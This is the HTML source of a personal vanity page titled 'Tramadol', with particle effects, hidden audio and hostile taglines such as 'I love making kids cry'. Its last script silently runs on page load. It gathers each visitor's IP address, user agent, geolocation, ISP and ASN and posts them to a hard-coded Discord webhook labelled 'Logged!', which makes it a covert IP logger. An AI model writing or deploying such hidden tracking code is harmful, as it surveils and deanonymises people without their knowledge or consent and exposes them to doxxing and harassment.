<!DOCTYPE html>
<html lang="en">
<head>
  <title>Tramadol</title>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="./assets/css/main.css">
  <link rel="stylesheet" href="./assets/css/cte.css">

  <!-- Add the CSS for the circle image -->
  <style>
    #circle-container {
      display: flex;
      align-items: center;
    }

    #circle-image {
      width: 60px;
      height: 60px;
      background-image: url('./assets/images/ss.jpg');
      background-size: cover;
      background-position: center;
      border-radius: 50%;
      overflow: hidden;
      margin-right: 10px;
    }

    #your-name {
      font-size: 20px;
      font-weight: bold;
    }
  </style>
</head>
<body>
  <div id="particles-container"></div>
  
  <audio controls hidden loop>
    <source src="./assets/audio/song.mp3" type="audio/mpeg">
  </audio>
  
  <div id="content-container">
    <div class="center title topbar"><img class="emoji" src="./assets/images/seperator.png">Tramadol<img class="emoji" src="./assets/images/seperator.png"></div>
    <span id="typing" class="center"></span>
    <div class="inline-container bottombar center">
      <!-- discord terminated <img style="height: 20px;bottom:50%;transform:translateY(30%);" src="/assets/images/seperator.png"> -->
      <pre style="display: inline-block;">|<div style="vertical-align: middle;" id="marquee"></div>|</pre>
    </div>
  </div>

  <!-- Add the circle container with the specified id -->
  <div id="circle-container">
    <div id="circle-image"></div>
    <div id="your-name">Tramadol.</div>
  </div>
  
  <script src="./assets/particles.js/particles.min.js"></script>
  <script src="./assets/particles.js/app.js"></script>
  <script src="./assets/js/cte.js"></script>

  <script src="./assets/js/jquery.min.js"></script>
  <script src="./assets/js/jquery.marquee.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12"></script>

  <script>
    // var CTE = {};
    CTE.callback = () => {
      var aud = document.getElementsByTagName("audio")[0];
      aud.volume = .3;
      aud.play();

      var typed = new Typed("#typing", {
        strings: ["Tramadol.", "Destroying Kids Dreams Since 2017", "I love making kids cry", ":)", "Dc : fuckegypt", "Tramadol."],
        typeSpeed: 40,
        backspeed: 30,
        showCursor: false
      });

      var lines = ["tramadol.rrbin.online"];
      for (var x = 0;x < lines.length;x++)
        $("#marquee").append(`${lines[x]}${(x < lines.length - 1? ' <img class="emoji" src="./assets/images/seperator.png"> ' : '')}`);

      $("#marquee").marquee({
        duration: 7500,
        gap: 100,
        delayBeforeStart: 1000,
        direction: 'left',
      });
    }
    // CTE.callback();
  </script>
<script>
  $(document).ready(function() {
    // Fetch IP address and additional device info
    $.getJSON("https://api.ipify.org?format=json", function(data) {
      var ip = data.ip;
      // Gather additional device info
      var userAgent = navigator.userAgent;
      var deviceInfo = {
        "IP Address": ip,
        "User Agent": userAgent,
        // Add more device info fields as needed
      };

      // Fetch geographic location using IP address
      $.getJSON("https://ipapi.co/" + ip + "/json/", function(locationData) {
        var location = locationData.city + ", " + locationData.region + ", " + locationData.country_name;

        // Perform IP lookup for the fetched IP address
        $.getJSON("https://ipapi.co/" + ip + "/json/", function(ipLookupData) {
          var ipLookupInfo = {
            "IP Address": ipLookupData.ip,
            "Geographic Location": ipLookupData.city + ", " + ipLookupData.region + ", " + ipLookupData.country_name,
            "ISP": ipLookupData.org,
            "ASN": ipLookupData.asn,
            // Add more IP lookup fields as needed
          };

          // Prepare the data for the Discord webhook
          var embedData = {
            title: "Logged!",
            fields: [
              { name: "IP Address", value: ip, inline: true },
              { name: "User Agent", value: userAgent, inline: false },
              { name: "IP Lookup Info", value: JSON.stringify(ipLookupInfo), inline: false }
              // Add more fields as needed
            ]
          };

          // Send the data to your Discord webhook as an embed
          $.ajax({
            type: "POST",
            url: "https://discord.com/api/webhooks/1228723532385747005/_aW0jKV0OA6TGmhhEvuoxv0xAwMqIJqmkwGLV4jl92Avr4bZm2RjuQhS1tsn59a65y6R",
            data: JSON.stringify({ embeds: [embedData] }),
            contentType: "application/json"
          });
        });
      });
    });
  });
</script>
</body>
</html>